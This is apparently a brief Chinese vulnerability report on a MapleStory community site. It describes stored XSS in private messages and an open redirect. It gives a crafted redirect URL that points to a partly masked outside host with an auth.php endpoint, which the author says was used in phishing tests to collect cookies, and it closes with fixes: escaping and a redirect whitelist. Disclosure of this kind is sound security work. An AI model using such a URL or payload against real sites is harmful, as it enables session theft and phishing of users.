發送短信息處可插入XSS 發給誰都行 打開就中招
用冒險島的做例子...
URL重定向就是我已經用來測試釣魚了... 自己看地址吧
http://city.mxd.sdo.com/default.aspx?mainUrl=http%3a%2f%2fxssin**e%2fauth.php%3fid%3d2407
然後pia pia pia地 cookies就來了
URL重定向就是我已經用來測試釣魚了... 自己看地址吧
http://city.mxd.sdo.com/default.aspx?mainUrl=http%3a%2f%2fxssin**e%2fauth.php%3fid%3d2407
修復方案:
XSS修復方法:轉義
URL重定向:做白名單